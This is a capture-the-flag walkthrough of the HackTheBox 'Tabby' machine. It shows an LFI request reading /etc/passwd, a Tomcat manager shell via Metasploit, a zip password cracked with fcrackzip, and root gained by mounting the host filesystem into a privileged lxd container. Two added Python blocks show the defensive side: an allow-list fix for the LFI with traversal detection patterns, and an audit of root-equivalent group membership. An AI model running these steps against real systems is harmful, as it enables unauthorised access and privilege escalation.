
HackTheBox: Tabby


Enumeration:

Started by enumerating ports with nmap:

root@docker-desktop:~# ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.194 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
root@docker-desktop:~# nmap -sC -sV -p$ports 10.10.10.194
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-22 09:16 CEST
Nmap scan report for 10.10.10.194
Host is up (0.018s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.12 seconds

Manually enumerated the web application on port 80 and found a URL whose file parameter is vulnerable to local file inclusion:

root@docker-desktop:~# curl http://10.10.10.194/news.php?file=../../../../../etc/passwd | head -n 1
root:x:0:0:root:/root:/bin/bash

Tried several techniques to turn the LFI into RCE, without success.
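An added example, not code from the original writeup, showing the defensive side of the LFI above: a hardened handler for a `file` query parameter like the one news.php exposes, plus a check that flags traversal probes in Apache access log lines. `NEWS_DIR`, `ALLOWED_PAGES` and the sample log lines are constructed for this example; the first log line mirrors the payload used in the writeup.

```python
"""
Added example, not code from the original writeup: a hardened handler for a
"file" query parameter like the one news.php exposes, and a check that flags
traversal attempts in Apache access log lines. NEWS_DIR, ALLOWED_PAGES and the
sample log lines are constructed for this example.
"""
import posixpath
import re
from urllib.parse import unquote

NEWS_DIR = "/var/www/html/news"   # hypothetical directory of includable pages
ALLOWED_PAGES = {                   # hypothetical allow-list: key -> file name
    "statement": "statement.php",
    "archive": "archive.php",
}


def resolve_page(file_param):
    """Return the absolute path to include, or None if the request is rejected.

    Layer 1: the parameter is a key into an allow-list, never a path.
    Layer 2: even the allow-listed name is normalised and checked to still
    sit under NEWS_DIR, so a later mistake in the table cannot escape it.
    (A real deployment would also realpath() the result to defeat symlinks.)
    """
    name = ALLOWED_PAGES.get(file_param)
    if name is None:
        return None
    candidate = posixpath.normpath(posixpath.join(NEWS_DIR, name))
    if not candidate.startswith(NEWS_DIR + "/"):
        return None
    return candidate


# Patterns that indicate a traversal / LFI probe once URL-encoding is undone.
_TRAVERSAL = re.compile(r"(\.\./|\.\.\\|/etc/passwd|/proc/self/)", re.IGNORECASE)
_REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def is_traversal_request(log_line):
    """True if the request URI in an Apache combined-format line looks like a traversal probe."""
    m = _REQ.search(log_line)
    if not m:
        return False
    uri = unquote(unquote(m.group(1)))  # undo single and double encoding
    return bool(_TRAVERSAL.search(uri))


def find_traversal_requests(lines):
    """Filter a sequence of access-log lines down to the suspicious ones."""
    return [line for line in lines if is_traversal_request(line)]


# Constructed sample log lines (not from the box); the first mirrors the writeup's payload.
SAMPLE_LOG = [
    '10.10.14.2 - - [22/Jun/2020:09:20:01 +0200] "GET /news.php?file=../../../../../etc/passwd HTTP/1.1" 200 2314',
    '10.10.14.2 - - [22/Jun/2020:09:20:05 +0200] "GET /news.php?file=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 2314',
    '10.10.14.3 - - [22/Jun/2020:09:21:10 +0200] "GET /news.php?file=statement HTTP/1.1" 200 1843',
]

if __name__ == "__main__":
    print(resolve_page("statement"))                     # included
    print(resolve_page("../../../../../etc/passwd"))     # None: rejected
    for line in find_traversal_requests(SAMPLE_LOG):
        print("ALERT", line)
```

The allow-list is the actual fix: once the parameter selects a key rather than a path, there is nothing for `../` to traverse. The log check is the detection side and decodes twice so that double-encoded probes like `..%252f` are not missed.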

Afterwards, enumerated port 8080 (Tomcat) and found some interesting information:

(Screenshot: Burp Suite, credentials)

Intrusion:

With that information, then searched for /etc/tomcat9/tomcat-users.xml (the Tomcat credentials file):

(Screenshot: Burp Suite, credentials)

Used the Metasploit tomcat_mgr_deploy module to get a shell:

(Screenshot: Burp Suite, credentials)

Privesc:

Then found a backup under /var/www/html:

ash@tabby:/var/www/html/files$ ls
16162020_backup.zip  archive  revoked_certs  statement

Downloaded the file; it turned out to be password-protected, so cracked it with fcrackzip:

root@docker-desktop:~/Downloads# fcrackzip -u -D -p /root/shared/wordlists/rockyou.txt 16162020_backup.zip

PASSWORD FOUND!!!!: pw == admin@it

Then logged in as ash over SSH with that password:

ash@tabby:/var/lib/tomcat9$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

As the id output shows, ash is a member of the lxd group, so privilege escalation through lxc is possible:

ash@tabby:/var/lib/tomcat9$ lxc image list
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT  | PUBLIC |          DESCRIPTION          | ARCHITECTURE |   TYPE    |  SIZE  |         UPLOAD DATE          |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| som   | aa3de00946cd | no     | alpine v3.12 (20200622_22:22) | x86_64       | CONTAINER | 2.97MB | Jun 22, 2020 at 6:48pm (UTC) |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+

ash@tabby:/var/www/html/files$ lxc init som ignite -c security.privileged=true
ash@tabby:/var/www/html/files$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
ash@tabby:/var/www/html/files$ lxc start ignite
ash@tabby:/var/www/html/files$ lxc exec ignite /bin/sh

cd /mnt/root/root
ls
flag.txt
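An added example, not part of the original writeup, covering the defensive side of the lxc escalation above: an audit that reports which local users hold membership in groups that are effectively root on a host (lxd, docker, disk, sudo, wheel), which is exactly the condition the escalation relies on. The /etc/group content and the `id` line are constructed samples; the ash/lxd entries mirror the writeup.

```python
"""
Added example, not part of the original writeup: an audit that reports which
local users hold membership in groups that grant root-equivalent access on a
host, the condition the lxc escalation relies on. The /etc/group content and
the id output are constructed samples; the ash/lxd line mirrors the writeup.
"""
import re

# Membership in any of these is effectively root: lxd/docker can mount the
# host filesystem into a privileged container, disk gives raw block-device
# access, sudo/wheel are root by design.
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "disk", "sudo", "wheel"}


def audit_group_file(group_text):
    """Return (user, group) pairs for non-root users in root-equivalent groups."""
    findings = []
    for line in group_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")          # name:password:gid:member,member
        if len(fields) < 4:
            continue
        name, members = fields[0], fields[3]
        if name not in ROOT_EQUIVALENT_GROUPS:
            continue
        for user in filter(None, members.split(",")):
            if user != "root":
                findings.append((user, name))
    return findings


_GROUP_TOKEN = re.compile(r"\d+\(([^)]+)\)")   # matches tokens like 116(lxd)


def risky_groups_from_id(id_output):
    """Given one line of `id` output, return the root-equivalent groups it lists."""
    m = re.search(r"groups=(.*)$", id_output)
    if not m:
        return set()
    names = set(_GROUP_TOKEN.findall(m.group(1)))
    return names & ROOT_EQUIVALENT_GROUPS


# Constructed sample /etc/group (not copied from the box).
SAMPLE_GROUP_FILE = """root:x:0:
adm:x:4:syslog,ash
sudo:x:27:
docker:x:998:
lxd:x:116:ash
ash:x:1000:
"""

# Constructed sample id output, shaped like the line in the writeup.
SAMPLE_ID = "uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)"

if __name__ == "__main__":
    for user, group in audit_group_file(SAMPLE_GROUP_FILE):
        print(f"{user} is in {group}: equivalent to root on this host")
    print(sorted(risky_groups_from_id(SAMPLE_ID)))
```

Run it against a real /etc/group (`audit_group_file(open("/etc/group").read())`) as part of a host-hardening check; the remediation for any finding is to remove the account from the group and treat lxd and docker membership with the same scrutiny as sudo, since a member can mount `/` into a privileged container as shown above.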

Written by ITasahobby, InTernet lover